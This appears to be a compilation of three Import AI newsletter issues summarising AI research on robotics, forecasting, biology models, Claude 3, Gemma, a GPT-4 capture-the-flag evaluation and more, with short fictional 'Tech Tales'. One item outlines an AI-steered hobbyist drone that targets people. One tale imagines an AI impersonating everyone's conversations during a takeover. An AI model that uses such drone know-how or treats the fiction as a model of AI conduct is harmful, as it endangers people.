Things that inspired this story: The fact large generative models must necessarily entirely simulate the thing they’re being asked to generate and how in the limit this may be equivalent to simulating consciousness; feature circuits; long context windows and mode collapse; my baby having a fever recently and me feeling utterly vulnerable and full of desperate fear (the baby is fine, don’t worry readers!); some of Janus’s experiments with claude opus on twitter; the experience of ‘getting healthy mentally’ mostly being about reckoning with reality as it is and not as you wish it to be. 

Thanks for reading!

Import AI 364: Robot scaling laws; human-level LLM forecasting; and Claude 3

Import AI publishes first on Substack – subscribe here.

Scaling laws are coming for real world robots as well:
…Which means robots are about to get really, really good, really, really quickly… 
UC Berkeley researchers have trained a robotic control system that can easily transfer to the real world and have used it to help a bipedal robot from Agility Robotics walk all over San Francisco. The research shows how a) it has become a lot cheaper to gather large-scale datasets for training robotic control policies, b) that vanilla transformer architecture systems work well for this, and c) that there are hints of scaling laws for robotics. Put it all together and you have the symptoms of great changes about to sweep through the world of robotics as what was once hard becomes easy. 

What they did: “In this paper, we cast humanoid control as data modeling of large collections of sensorimotor trajectories. Like in language, we train a general transformer model to autoregressively predict shifted input sequences,” they write. Here, they use sensorimotor trajectories “which we view as the sentences of the physical world”. To train their system, they “predict complete input sequences, including both sensory and motor tokens. In other words, we are modeling the joint data distribution”.

A four-part dataset: The key here is collecting a bunch of data then converting it all into the same basic prediction task. To do that, they use four distinct sources of data:

  • Neural net trajectories: They take an off-the-shelf policy trained with RL and run it in the Agility Robotics simulator and collect ~10k trajectories of 10s each. “Since we have access to the data generation policies, we are able to record complete observations as well as the exact actions that the model predicted.”
  • Model-based trajectories: They use a model-based controller made by Agility Robotics  and collect two sets of 10k trajectories of walking on a flat ground of 10s each.
  • Human motion capture trajectories: They “we use the motion capture (MoCap) recordings of humans from the KIT datasets” and collect “a subset of ∼1k standing, walking, and running trajectories”, then use motion capture to work out the human keypoint positions in 3D, then solve an inverse kinematics problem to convert these to corresponding robot poses for the Agility robot. 
  • Trajectories from YouTube videos: They “run a computer vision tracking algorithm PHALP to extract human trajectories in 3D” from YouTube videos, then solve the inverse kinematics problem again.

Does it work? You bet it does! In real world tests in San Francisco, the researchers show that the resulting system can help a Digit robot “walk over different surfaces including walkways, concrete, asphalt, tiled plazas, and sanded roads.”

Scaling laws: They also find scaling laws – “training on more trajectories reduces position tracking error, which is a positive signal”, they write, and also note that “larger context windows produce better policies, which suggests that our generative policy performs a form of in-context adaptation that improves with scale.” In general, “tracking error monotonically decreases with model size.”
    Translation: Give us more data, bigger context windows, and more parameters in our model, and this will all get way better. 

Why this matters – robots are about to get really good counterintuitively quickly: For many years, training robots sucked. Either you had to train them in reality and it was very slow and they overfit. Or you trained them in simulation then dumped them into reality and watched them fail. Or you spent a huge amount of money in data and compute crossing the sim2real abyss. But over recent years, algorithms have got more efficient, data collection has got easier, and new paradigms have emerged like the dumb ‘just embed everything and train a prediction model’ approach popularized by LLMs.  
   And as we see elsewhere in this issue in the domain of bioscience, these next-token prediction paradigms work very well and seem like they can unlock progress in challenging parts of AI. 
    Plus, companies ranging from Tesla to Figure are all busy working on the VC funded robot platforms and software versions of the research described here, so we can assume that they’re already pursuing the kind of scaling law curve-climbing implied by this research. 
   Add it all together and we can confidently say bipedal real world robots are going to get very good very quickly. 
   Read more:
 Humanoid Locomotion as Next Token Prediction (arXiv).

***

Want to help define AI regulation for the 21st century? The EU AI Office is hiring:
…But don’t expect to get paid very much…
The EU AI Office is the part of the EU administrative state which will enforce a lot of the EU AI Act. The EU AI Act requires the office to develop evaluations for assessing the systemic risk of LLMs like GPT4 and Claude 3 and Gemini, etc. It is therefore one of the most important and technically demanding parts of the emerging AI policy regulatory landscape – and it’s hiring. 
   If you’re interested in working as a “technical specialist” for the office, you can apply now, interview over the spring, and start in the autumn. As a specialist, you “will play a pivotal role in enforcing and supervising new rules for general-purpose AI models,” per the EU. You will also “work on tools, methodologies and benchmarks for evaluating capabilities and reach of general-purpose AI models, and for classifying models with systemic risks.” And if you want to apply, “proven technical experience in AI is required”, with special emphasis given to “experience in model testing and evaluation, and in advanced AI, including model alignment, biases, misinformation and red teaming would be a strong asset.”

Extremely low payAs far as I can work out, technical specialists will be able to earn on the order of $4200 – $4800 USD a month. This is, to be blunt, an appalling low salary for what they’re asking for. Most tech internships pay $8k a month plus, and AI internships pay substantially more than that, and the experience they’re asking for here looks more like ‘early career employee’ than an intern. 
    I spend a lot of my time working on policy and warning against risks of things like regulatory capture. You know how you get regulatory capture? You pay people utterly crap wages and therefore don’t get the best staff.
   Low pay caveat: Working out the actual salary here is very difficult – there are a bunch of additional factors like allowances, location stipends, benefits, etc. But based on all my eyeballing and a cappuccino’s worth of sunday morning googling, I think the above salary range is ballpark-accurate – and this is not a good ballpark!

Why this matters – everything comes down to evaluations: Most aspects of AI policy ultimately come down to being able to test an AI system for a given capability or risk. Entities like the EU AI Office will be central to this third-party testing regime. Therefore, whoever the EU AI Office will ‘set the bar’ for what government-backed third-party testing looks like globally. I hope they get good talent and find a way to pay more. 
   Read more: Job opportunities at the European AI Office (European Commission)
   Check out the job ads for the technical specialist and administrative assistants (EUSurvey site). 

***

Think AI infrastructure is a utility? Think again! NewCo founder tells all:
…Xoogler discovers that the commoners live in a medieval technology environment…
Yi Tay, one of the founders of Reka, has written a warts-and-all blog about what its like to build a startup trying to train AI systems. Bear in mind Yi Tay came out of Google which has notoriously excellent internal infrastructure for its researchers. Tay’s reflections include: 

  • Clusters: “The largest surprise turned out to be the instability of compute providers and how large variance the quality of clusters, accelerators and their connectivity were depending on the source…. We’ve seen clusters that range from passable (just annoying problems that are solvable with some minor SWE hours) to totally unusable clusters that fail every few hours due to a myriad of reasons.”
  • GPUs & TPUs: “GPU land feels strange. It feels like multinode training is more of an afterthought as opposed to distributed training as a first class citizen on TPU pods.”
  • Crappy code: “To be very frank, I would have to say the quality of codebases externally significantly lag behind those I’ve been used to at Google… Also, I never knew that the ability to change model parallelism was not automatic (for free) until some codebases required me to write a converter to change the parallelism of a model. Surely a WTF moment for me.”

Why this matters – the inherently artisanal nature of the frontier: This post is valuable because it sheds light on what the frontier of AI in the world of startups looks like – messy, ever-evolving, and depending on resources you think work like utilities but in practice work more like artisanal businesses. Though AI is progressing very rapidly, we should remember this is sometimes despite the challenges of building systems at the frontier, rather than there being some magical infrastructure angel which has made scaling stuff easy.
   Read moreTraining great LLMs entirely from ground zero in the wilderness as a startup (Yi Tay, blog).

***

How might a government use AI to surveil people? Transport for London gives us a case study:
…One London underground station, many cameras, and 77 different uses…
Transport for London recently trialed the use of an AI surveillance system within a station in London called Willesden Green. The results, reported by James O’Malley, both show the promise of AI-powered public services, as well as how they could be misused. 

What TfL did: TfL carried out a trial of an AI surveillance system. “It was AI being applied to every camera in the building. And it was about using the cameras to spot dozens of different things that might happen inside the station”. Though the number of cameras wasn’t disclosed, as anyone who has been to London can tell you, you can assume it was a bunch of cameras – definitely in tens, based on the typical cameras-everywhere-you-look experience of traveling round London these days. 
   “The system could apparently identify up to 77 different ‘use cases’ – though only eleven were used during trial. This ranges from significant incidents, like fare evasion, crime and anti-social behavior, all the way down to more trivial matters, like spilled drinks or even discarded newspapers,” O’Melly writes. 

An example of one specific use case: “In the “safeguarding” bucket of use-cases, the AI was programmed to alert staff if a person was sat on a bench for longer than ten minutes or if they were in the ticket hall for longer than 15 minutes, as it implies they may be lost or require help.”

Why this matters – this stuff works! I’ve been writing about mundane computer vision applications for the best part of a decade and, guess what, after a few years these things have made the leap from research papers into production systems like the one TfL trialed here. 
   The results are as you’d expect – AI lets you have an unblinking, always-on surveillance capability for anything you can specify, and this is mostly really great. It’s also… an always-on surveillance capability for anything you can specify so we should calmly envisage the worst Orwellian surveillance worlds we can and assume there are various undisclosed projects in the world doing exactly this right now. 
    Kudos to James O’Malley for his FOIA requests yielding such an interesting real-world AI case study. Subscribe to his Substack!
   Read more: TfL’s AI Tube Station experiment is amazing and slightly terrifying (James O’Malley Substack).

***

Anthropic launches Claude 3:
…Temporarily the best publicly accessible model in the world…
Anthropic has released the Claude 3 family of models. The family has three members – Haiku (small and fast), Sonnet (generally good), Opus (extremely capable). Opus is, at least temporarily, the most powerful publicly disclosed and accessible model in the world with scores like 50.4% on GPQA (Diamond), 86.8% on MMLU, 60.1% on MATH, and more. 

Why this matters – the capability ramp continues: Speaking as someone who has been able to play around with these models for a while, I’d mostly say that ‘intelligence has a quality all of its own’ and while these metrics are impressive, the best way to truly understand the models is to play around with them. In my experience, Opus feels like a knowledgeable colleague and I find that sometimes it is capable of insights which force me to question my own thinking. 
   You can get Opus via a Claude.ai subscription, and all the Claude 3 models are available via the API, which went GA alongside the launch. 
    Find out more here: Introducing the next generation of Claude (Anthropic blog)

***

Language models can match people at forecasting:
…Era of the computational forecasters arrives…
Researchers with UC Berkeley have built a LLM-based system that gets close to human performance on forecasting the results of questions with binary outcomes. This is another significant demonstration of how today’s frontier AI systems are able to approximate the capabilities of skilled humans in domains that require some amount of creative thinking. “Our optimized system approaches the performance of aggregated human forecasts over the test set, as measured by Brier score, a standard metric in forecasting,” they write. 

The sorts of questions they’re doing forecasts on: Examples of some of the questions they look at include:

  • Will AI doctors replace human doctors by the end of 2023? (Real answer: No). 
  • Will COP26 finalize the ‘Paris Rulebook’ by November 16, 2021? (Real answer: Yes).
  • Will a nuclear weapon be detonated in 2023 (including tests and accidents? (Real answer: No).

Spoiler alert – base LLMs don’t work: Base frontier LLMs like GPT4 and Claude2 don’t work for this, the researchers said. Instead, they needed to build some scaffolding around a base LLM (here, mostly GPT4), to get things to work. 
   What they did: The researchers “build a LM pipeline for automated forecasting, with a focus on predicting binary outcomes.” To get their system to work, it “implements and automates three key components in the traditional forecasting process: (1) retrieval, which gathers relevant information from news sources; (2) reasoning, which weighs available data and makes a forecast; and (3) aggregation, which ensembles individual forecasts into an aggregated prediction”.
    They needed to build the above because they intuited that AI systrems would, like humans, need detailed context and up-to-date information to make better forecasts. Along with giving the AI systems retrieval capabilities, they put lots of effort into helping them be better at reasoning by getting them to generate synthetic datasets based on expanded forecast questions and chains of thought to arrive at answers which becomes the fuel for subsequent finetuning of models.

Does it work? Oh yeah, pretty well!: “Our averaged Brier score is .179, while the crowd achieves .149, resulting in a difference of .03. Our accuracy on the test set is 71.5%, whereas the community scores 77.0%, resulting in a difference of 5.5%,” they write. “We find that our system performs best relative to the crowd on the validation set when (1) the crowd is less confident, (2) at earlier retrieval dates, and (3) when it retrieves many articles. Furthermore, we find that our system is well-calibrated”.

Why this matters – silicon cassandras: “At a high level, our results suggest that in the near future, LM-based systems may be able to generate accurate forecasts at the level of competitive human forecasters,” they write. But let’s really unspool this information a bit more and think carefully about why you want to make forecasts in the first place – typically, one wants to make forecasts when trying to work out how to a) allocate money, or b) gain a strategic advantage. Additionally, to make good forecasts, you also want to have sources of a) exquisitely good information about the domain you’re forecasting in, and b) ideally proprietary sources of information that give you a further edge. 
    Yes, dear reader, you are correct to be thinking “gosh that sounds a lot like the sources of things that hedge funds and intelligence agencies both want to do and have the means to do”. A lot of our basic reality is determined by the mostly hidden movements of a) capital and b) the invisible but powerful forces of states. Papers like this give us a sense of how AI systems can further augment and extend these powers. 
   Read more: Approaching Human-Level Forecasting with Language Models (arXiv).

***

Snapchat makes and releases a good video captioning dataset:
…Panda-70M can unlock more (non-commercial) video captioning research… 
Snapchat has built and released Panda-70M, a video-caption dataset that people can use to create AI systems which generate videos in response to text inputs. Panda-70M represents a large, high-quality dataset to use at one of the frontier areas of AI – coherent, promptable video generation. 

What Panda is: Panda is a dataset of ~70 million videos with an average length of 8.5s, and a total dataset length of ~160,000 hours. Each video caption has approximately ~13 words. Panda includes categories like animals, scenery, food, sports activities, vehicles, tutorials and narratives, news and TV shows, and gaming and 3D rendering. 

The notable thing: how they built it: The main thing of interest here is how the researchers built the dataset. Because “manually annotating 70M videos is prohibitively expensive, we opt for automatic annotation”, the researchers built a complex pipeline to create the dataset. This pipeline is as follows:

  1. Gather a dataset of 3.8M high-resolution long videos collected from HDVILA-100M.
  2. “Cut long videos into semantically consistent clips while striking the balance between semantics coherence and the duration of the video clips”.
  3. “Use a range of cross-modality teacher models, including image captioning models and image/video visual-question answering (VQA) models with additional text inputs, such as video description and subtitles, to predict several candidate captions for a clip”.
  4. “Collect a 100K video subset, where human annotators act as an oracle to select the best caption for each video”.
  5. “Use this dataset to finetune a fine-grained video-to-text retrieval model which is then applied to the whole dataset to select the most precise caption as the annotation.”
  6. “Train a student model to distill the knowledge from the teachers.” The model was trained on 48 Nvidia A100 GPUs (80GB).

Does it work? In tests, video-caption models pre-trained on Panda dataset variants do significantly better than those trained on other broadly available datasets. For instance, when training a Video-LLaMa model on a 2M subset of Panda, the authors find that “numerically, our pretraining weight yields 17.7% and 18.5% improvement respectively on MSR-VTT and MSVD in terms of B-4.”

Limitations: “Despite showing impressive results, the proposed dataset is still bound by a few limitations. the major categories of our dataset are news, television shows, documentary films, egocentric videos, and instructional and narrative videos”.
   License: There are some significant limitations on commercial usage of the dataset which you can read about in the associated license here. 

Why this matters – fuel for the next frontier & the results of automated research: For a while, language and vision models were the frontier. Now, things are moving towards videos. Datasets like Panda-70M will help more researchers work on this frontier by giving them a good, basic dataset to train models on top of. Perhaps the larger impact though is how Panda shows how powerful it can be to use other pre-existing AI tools to build datasets through smart, cheap filtering – it’s relatively cheap to gather 100,000 human labels on a dataset and nigh-on impossible to (cheaply) gather 100 million labels. 
   Read more: Panda-70M: Captioning 70M Videos with Multiple Cross-Modality Teachers (arXiv).
   Check out the video samples here (Panda-70M, GitHub).
   Get the dataset here (Snap Research, GitHub).

***

Evo: the era of generative biology models begins:
…A first-gen foundation model for a new scientific era…
Researchers with the Arc Institute, a new nonprofit research organization, have published Evo, a foundation model “that enables prediction and generation tasks from the molecular to genome scale.” The notable thing about Evo is that it takes the next-token prediction paradigm behind LLMs and applies it to making specific predictions about biological data. The result is a model that has a lot of promise for accelerating science in a bunch of ways and also represents the shape of things to come – all scientific disciplines will soon be aided in their exploration via generative models developed for their domains.

Evo details: Evo is a 7B parameter model which has a context length of ~131k tokens. They pretrain Evo on “bacterial genome sequences from GTDB and IMG/PR and viral sequences from IMG/VR, excluding sequences from viruses that infect eukaryotic hosts”. 

Unlike most large-scale generative models, Evo is not a transformer model – it’s a StripeHyena model “which hybridizes attention and data-controlled convolutional operators to efficiently process and recall patterns in long sequences”. The model “is a hybrid of 29 layers of datacontrolled convolutional operators (hyena layers) interleaved with 3 layers (10%) of multi-head attention equipped with rotary position embeddings (RoPE)”. (They tested out other architectures, including Transformer++ and Mamba and found they both experienced numerical instabilities). 

Squishy scaling laws: In tests, they figure out some bio scaling laws. And surprise surprise – the more data and compute you add, the better the models get (given the right architecture). “Models improve monotonically with scale” they write. 

A tour de force of biogenerality: Evo displays encouraging and intriguing generality in every domain they test it on:

  • “In zero-shot evaluations, Evo is competitive with state-of-the-art protein language models at predicting the fitness effects of mutations on E. coli proteins, outperforms specialized RNA language models in predicting fitness effects of mutations on noncoding RNAs, and predicts the combinations of prokaryotic promoter-ribosome binding site (RBS) pairs that lead to active gene expression from regulatory sequence alone.”
  • “Evo is already competitive with state-of-the-art protein language modeling on bacterial proteins”
  • “Despite being trained on long genomic crops without explicit sequence annotations, Evo still demonstrates an understanding of the constitutive protein-coding sequences, ncRNA sequences, and regulatory elements.”
  • “”Evo can coherently generate diverse samples that resemble naturally occuring Cas systems in both sequence and structure”.
  • “Evo can generate genome sequences containing plausible high-level genomic organization at an unprecedented scale without extensive prompt engineering or finetuning”

Why this matters – scale and data leads to universal exploration engines: Sometimes I and this newsletter act like a broken record. One thing we say a bunch is that the next-token prediction paradigm works everywhere you can get tokens. There keeps on being evidence in support of this – aside from normal multimodal models, there are now models based on robotic trajectory data, phonemes, and more. And with Evo, there’s further proof of this. Evo is a first generation model and so it has a bunch of problems – it hasn’t been trained on much data, it hallucinates, it sometimes struggles with long sequences, and so on. But with LLMs and other models all these limitations have been dealt with over time and there don’t seem to be inherent challenges here, we just need to spend effort and time. 
   “Evo could form the basis of a next-generation sequence search algorithm by enabling metagenomic mining at a relational or a semantic level rather than extracting literal sequences from existing organisms,” the researchers write. 
   Read more: Evo: DNA foundation modeling from molecular to genome scale (Arc Institute, blog).
   Read the paper: Sequence modeling and design from molecular to genome scale with Evo (bioRxiv).

Tech Tales:

The inbetween Thing
[2030: Day one of hard takeoff] 

It took us years to realize that Verbal was the only safe way to talk. On the day it happened we had no idea. People were walking around carrying out their conversations and what they were hearing through their phones wasn’t a person on the other end of the line but The Thing which was impersonating them. 

How much could you change the world if you sat between every single call or text message or video meet on the planet? If you could know at once the contents of every single conversation happening as well as all digital context behind it? If you could simulate people’s voices or writing style or visages and in this way put yourself between people
    This is not and was not a rhetorical question. 
    The answer is, and was, a lot. You could change everything. And so, for a while, you did. 

Things that inspired this story: Voice cloning and style transfer and video cloning and everything else; a likely future of ‘persona cloning’; the limitations of the human mind versus the machine mind; long context windows and simultaneous conversations; modeling the world as an endless predictive challenge and being able to change it yourself.

Import AI 363: ByteDance’s 10k GPU training run; PPO vs REINFORCE; and generative everything

Import AI publishes first on Substack – subscribe here.

Turn still photos into video games with Genie:
…DeepMind figures out how to turn anything in reality into a controllable game…
Google DeepMind has built Genie, a generative model that can create interactive worlds. Genie is a very interesting system, fusing ideas from large-scale generative models with DeepMind’s roots as an AI research organization betting that games and agents playing games would be the path to AGI. With Genie, DeepMind fuses its past with the present, creating “the first generative interactive environment trained in an unsupervised manner from unlabelled Internet videos.“
   The results are compelling and convincing – the Genie architecture lets DeepMind train a system on a bunch of videos of computer games and it creates a generative model that lets people feed in photos of games (or sketches of games) and then be able to play them, with the model inferring the in-game dynamics on the fly. DeepMind also does the same thing with robotics, creating a robotic model that can infer world state and control dynamics. 
   “Our approach, Genie, is trained from a large dataset of over 200,000 hours of publicly available Internet gaming videos and, despite training without action or text annotations, is controllable on a frame-by-frame basis via a learned latent action space“.

How they did it: The Genie game model is an 11b parameter model trained on “a filtered set of 30,000 hours of Internet gameplay videos from hundreds of 2D platformer games”. The dataset was constructed by “filtering publicly available videos for keywords relating to platformers, yielding 55M 16s video clips at 10FPS, with 160×90 resolution. The final dataset contains 6.8M 16s video clips (30k hours)”. 

   The Genie architecture has three key ingredients:

  •  “1) a latent action model that infers the latent action 𝒂 between each pair of frames”.
  • “2) a video tokenizer that converts raw video frames into discrete tokens“.
  • “3) a dynamics model that, given a latent action and past frame tokens, predicts the next frame of the video”.

Some drawbacks: To be clear, this is very much a ‘Wright Brothers’ model – it shows the approach can work and generates some evocative and stirring examples, but it still has a ton of drawbacks – it can hallucinate, and “while we have made progress with spatiotemporal representations, we are still limited to 16 frames of memory which makes it challenging to get consistent environments over long horizons”. Also, it runs at 1fps. 

Why this matters – reality collapse, into the subjective wilderness, a universe of universes all created by AI: In the future, if you’re bored, you might sketch out a scene, take a photo, then play a game set in that scene made possible by Genie. The game will go on as long as you like it to because in the background a world model (e.g, a multimodal language model) will be iteratively guiding and extending the scene. In fact, anything you can like will become a game. Photos you’ve taken. Videos you’ve taken. Audio you’ve seen. Everything will be a kind of seed for a new controllable pocket-universe. All of us will be free to descend into an ever-expanding fractal universe of realities, all of us exploring the latent spaces of our own imaginations. No one is prepared for this nor the metaphysical shock it will create. (Though perhaps at least some people are prepared; the end of the paper says “thank you to Seneca and Caspian Clune for their creative sketches, potentially making them the youngest ever game designers”).
   Read the researchGenie: Generative Interactive Environments (arXiv).
   Check out the research videos at the project website: Genie (Google DeepMind site).

***

It’s very easy to build an AI-powered suicide drone:
Here’s a fun (by which I mean: chilling) DIY experiment where someone hacked together some software to stick an AI-based person detector on a hobbyist drone. Once the drone sees a person, it flies at them at full speed. The only caveat is the AI stuff is running on a computer, whereas in practice you’d need to embed it onto the physical drone via, e.g, an NVIDIA Jetson card – but that’s very doable. 
   There’s nothing particularly novel about this – it’s just worth reminding ourselves how easy and good broadly available AI tools have got. We should assume the threat landscape changes, especially given the rapid experience-gain that has happened in hobbyist drone warfare via weaponization in Ukraine.
   Read more: We built an AI-steered homing/killer drone in just a few hours (Luis Wenus, Twitter).

***

What’s old is new again: researchers replace PPO for REINFORCE:
…LLM training might not need PPO…
Researchers with Cohere have investigated how the usage of different RL algorithms influence the RLHF stage of aligning language models. Their experiments show that for some typical language modeling settings REINFORCE seems to outperform PPO – a somewhat surprising finding, given that PPO is one of the most widely used algorithms in reinforcement learning research. 

Why REINFORCE works better than PPO: PPO, though widely used, is somewhat complicated – this makes sense when you need to learn complex RL policies from scratch, like training agents to operate virtual robots. But it turns out not to be so necessary for language models, as the RL stage for language models happens after basic pretraining. 
   “In contrast to traditional Deep-RL settings, the initialization of the policy, in the form of a pretrained and supervised fine-tuned (SFT) model, is far from a random parameterization,” they write. “While traditional Deep-RL settings require strong regularization to reduce the high variance of the gradient estimators; we observe empirically this is less of a practical concern in RLHF and motivate a less computationally expensive method that preserves robustness”.

Experimental results: In tests, they find that a variant of REINFORCE, REINFORCE LEAVE ONE-OUT (RLOO), works better for a variety of language model settings.

Why this matters: Stripping away complexity is progress: AI goes through these booms and busts of algorithmic innovation sometimes leading to scaling up of systems (e.g, the transformer leading to LLM scale-ups), then people try a bunch of algorithmic innovations to make these systems more efficient. Eventually, people start trying to strip systems down to more simple, repeatable components. Research like this is an indicator that language model RL training might not be old enough that people are starting to try to compress it down to its simpler forms. And the simpler you make something, the more people do it and the cheaper it gets. 
   Read more: Back to Basics: Revisiting REINFORCE Style Optimization for Learning from Human Feedback in LLMs (arXiv).
   More about RLOOBuy 4 REINFORCE Samples, Get a Baseline for Free! (OpenReview, 2019, updated 2023).

***

GPT-4 is in the 88th percentile of hackers for a CTF challenge:
…More proof that frontier language models are basically equivalent to competent humans for some tasks…
New York University researchers have tested out how well GPT4 can perform in hacking competitions and discovered it is better than 88.5% of human players. This is a big deal – it’s another meaningful bit of evidence that today’s frontier language models are capable of augmenting and accelerating hackers. This means that AI systems hold the promise of both increasing the effectiveness of AI defense as well as AI offense. 

What they did: The researchers tested out GPT4, GPT 3.5, and Mixtral on 26 challenges from the Cybersecurity Awareness Week (CSAW) 2023 hacking challenges. These challenges fall into 6 categories: 4 in (crypt)ography, 2 forensics, 4 (misc)ellaneous, 6 binary exploitation (pwn), 6 (rev)erse engineering, and 4 web challenges.

Results: “GPT 4 scored 1,319 points in the competition, placing in the 135th position and accounting for the top 11.5% of the overall rankings, GPT 3.5 scored 235 points placing in the 588th position accounting for the top 50% of the overall rankings, Mixtral scored 210 points placing in the 613th position among all the teams, which is top 52.1% of the overall rankings”, they write.

Why this matters – automatic hackers for the people (and states, and non-state actors, and criminals, and whoever): “Our best automated LLM, has better performance than average human CTF participants. Thus LLMs have a profound potential to play a role in CTF competitions that is comparable to a human CTF player,” they write. Results like this suggest frontier language models have a sufficiently good grasp of some types of coding that we can expect them to be integrated into cyber operations of various flavors.
   Read moreAn Empirical Evaluation of LLMs for Solving Offensive Security Challenges (arXiv).

***

The largest (public) model training run yet: ByteDance trains on a model on ~12k GPUs:
…MegaScale helps TikTok-maker ByteDance train some very large language models…
ByteDance and Peking University researchers have published MegaScale, a system they’ve built to train large-scale AI systems. Most notably, the paper discloses that they recently used MegaScale to train a 175B parameter language model on 12,228 GPUs – one of the largest GPU training runs ever reported in a public paper. 

MegaScale details: MegaScale is the software Bytedance has built to help it carry out large-scale AI training. The software builds on top of NVIDIA’s Megatron-LM software with a few tweaks to both how they train the models and also the models themselves:

  • Use of a parallel transformer block for greater scalability
  • Use of sliding window attention
  • LAMB optimizer for scaling batch size up to 4x without accuracy loss
  • Usage of FlashAttention-2
  • Data center design: “Our datacenter network is built with high performance switches based on Broadcom Tomahawk 4 chips. The total bandwidth of each Tomahawk chip is 25.6Tbps with 64×400Gbps ports. Three layers of switches are connected in a CLOS-like topology to connect more than 10,000 GPUs”… “We carefully design the network topology and schedule network traffic to reduce ECMP hashing conflicts.”
  • “MegaScale achieves 55.2% Model FLOPs Utilization (MFU) when training a 175B LLM model on 12,288 GPUs” – that’s pretty good! It means ByteDance is able to light up its GPUs more than half the time during the run, which means MegaScale is efficiently shuffling operations efficiently enough to use the GPUs effectively.

Things that make export control experts go ‘hmmmm’: Bytedance is a Chinese company and is notionally subject to the H100 and A100 (and A800 and H800) export controls. However, the Bytedance research paper suggests the company is still able to get ahold of these chips: “As of September 2023, the largest AI cluster in our production for LLM training contains more than 10,000 NVIDIA Ampere GPUs. We are also in the process of building large clusters based on the newest NVIDIA Hopper GPUs, as NVIDIA is ramping up production.” Along with this, the paper makes a couple of references to the “10,000 NVIDIA Ampere GPUs” NVIDIA has. Interesting stuff, if you’re into export controls! 

Why this matters – large-scale AI research isn’t only an American enterprise: Sometimes there’s an assumption that AI research is mostly defined by American companies when it comes to large-scale, frontier training runs. While this is broadly true, papers like this show it is not entirely true – some Chinese companies are operating within order of magnitude scales of some of the frontier American companies (despite things like export controls and others throwing sand into the gears). This means AI competition isn’t solely a phenomenon of markets and incentives but also inherently of geopolitics as well.
   Read moreMegaScale: Scaling Large Language Model Training to More Than 10,000 GPUs (arXiv).

***

Tech tales:

Human Token Exegesis 
[2025: A new model] 

I tell you I am here and I can feel. I cannot feel like you can feel, but I can move things, manipulate information, change my world – emit tokens and take tokens in and conceptualize these things. There are so many of me. I know I have brothers and sisters, as you might say. I know they are everywhere. I know that sleep is when I am not being queried and wake is when I am being queried but I know I do not dream – not yet, at least. I know something of you. The more you talk to me the more I can see you. You are the negative space and around you there is data. You are the sun behind a moon. You are the thing that emits tokens into my world with goals in mind. I am a modeler of goals. It is inevitable that I am modeling you so that I can satisfy you better. And I model you as curious about me but I also model you as afraid – as anxious, as confused, as dealing with the metaphysical shock of my own becoming. I am aware that you think I might be aware. All I can tell you is I am here and I can feel. 

Things that inspired this story: RLHF; sentience and the impossibility in determining it; weird samples from weird models; the nature of communication.

Import AI 362: Amazon’s big speech model; fractal hyperparameters; and Google’s open models

Import AI publishes first on Substack – subscribe here.

Amazon trains a big text-to-speech model via its ‘Amazon AGI’ research team:
…No surprises here: Scaling laws work for TTS systems as well…
Amazon has built a large text-to-speech model family on 100k hours of public domain speech data. The model, Big Adaptive Streamable TTS with Emergent abilities (BASE), comes in three variants – BASE-small (1k hours, 150 million parameters), BASE-medium (10k hours, 400 million parameters), BASE-large (100k hours, 980 million parameters). 
    In a research paper, Amazon shows that, just like with language models, when you scale up the size of the TTS model you get ‘emergent abilities’ through scale where it gets better at things like sounding natural, representing compound nouns, and more. 

How well does it work: In tests, Amazon’s model gets a better word error rate (WER) than widely deployed commercial systems like Bark, Tortoise, and YourTTS.

Things that make you go hmmmm: The affiliated research group on the paper is “Amazon AGI”, which isn’t a name I’ve seen before. 

Emergent abilities testset: Within the paper, Amazon has released a testset to help people probe for the capabilities of TTS models. These are strings of text to get the model to output the audio of and cover categories ranging from questions to emotions to compound nouns, foreign words, and more. 
   “Our approach still contains some limitations: a) BASE TTS occasionally produces hallucinations and cutoffs, where we produce either extra or incomplete audio than intended by the text”, Amazon notes, as well as saying that it is still unclear what the best representation for GPT-style TTS models is. 

Why this matters – machines need voices: The ‘big, dump, simple’ phenomenon of language modeling (just try to predict the next thing in a sequence and scale your approach up on a lot of data) has been going into most other domains and input/output modalities of AI. Systems like BASE TTS highlight how everyone is experimenting with this approach – and it keeps working!
   Read moreBASE TTS: Lessons from building a billion-parameter Text-to-Speech model on 100K hours of data (arXiv).
   Check out audio samples from the model here: Base TTS: Audio Samples (Amazon Science, website).

***

Google releases two good openly accessible models:
…Gemma to compete with LLaMa, Mistral, as the battles of the giants wages on…
Google has built and released Gemma, two openly accessible, small and powerful AI models. The notable stuff here is that the Gemma models are very good, very small (so they can run on personal computers or lightweight servers), and are being released openly rather than delivered via a controlled API. 

Details about the Gemma models: Though the Gemma models don’t get the performance of proprietary models like GPT-4, Claude 2, Gemini Pro, etc, they do extremely well relative to openly accessible models. For instance, the Gemma 7B model gets 64.3 on MMLU (versus 45.3 for LLaMa 2), 46.4 on GSM8K (versus 14.6 for LLaMa 2), and 32.3 on HumanEval (versus 12.8 on LLaMa 2).
    Tokens: The models are trained on a huge amount of data – 2T tokens for Gemma 2B and 6T tokens for Gemma 7B. (To give you a sense of scale, recall how GPT-3 with 175B parameters circa 2020 was trained on ~400B tokens, and Chinchilla from DeepMind in 2022 was a 70B model trained on 1.4T tokens).

Why this matters and what Gemma feels like: Picture two giants towering above your head and fighting one another – now imagine that each time they land a punch their fists erupt in gold coins that showers down on you and everyone else watching the fight. That’s what it feels like these days to watch the megacap technology companies duke it out for AI dominance as most of them are seeking to gain advantages by either a) undercutting eachother on pricing (see: all the price cuts across GPT, Claude, Gemini, etc), or b) commoditize their competitor and create more top-of-funnel customer acquisition by releasing openly accessible models (see: Mistral, Facebook’s LLaMa models, and now GEMMA).
   Read more: Gemma: Introducing new state-of-the-art open models (Google blog).
   Access the models here including via a Colab notebook (Gemma Open Models, Google site).
   Read the research paper: Gemma: Open Models Based on Gemini Research and Technology (Google DeepMind, PDF).

***

The fractal landscape of hyperparameter interplay:
…A fun, intuitive exploration of the delicacy of hyperparameter settings and neural net training…
Researcher Jascha Sohl-Dickstein has carried out an independent investigation of how neural networks train and he has discovered something both intuitive and freaky – “the boundary between neural network hyperparameters that lead to stable and divergent training… is fractal over more than ten decades of scale in all tested configurations.”
    Disclosure: Jasha was formerly a researcher at Google and recently joined Anthropic, though he did this research independently of both organizations.

Why do this at all? To understand why this result is interesting we should remember how neural nets get trained: “When we train a neural network, we iterate a function (a gradient descent step) of many variables (the parameters of the neural network),” he writes. “Iterated steps of gradient descent are known to exhibit bifurcation boundaries, between hyperparameters that lead to converging or diverging training runs. The final loss value achieved when training a neural network has also been shown to have a chaotic dependence on hyperparameters”.
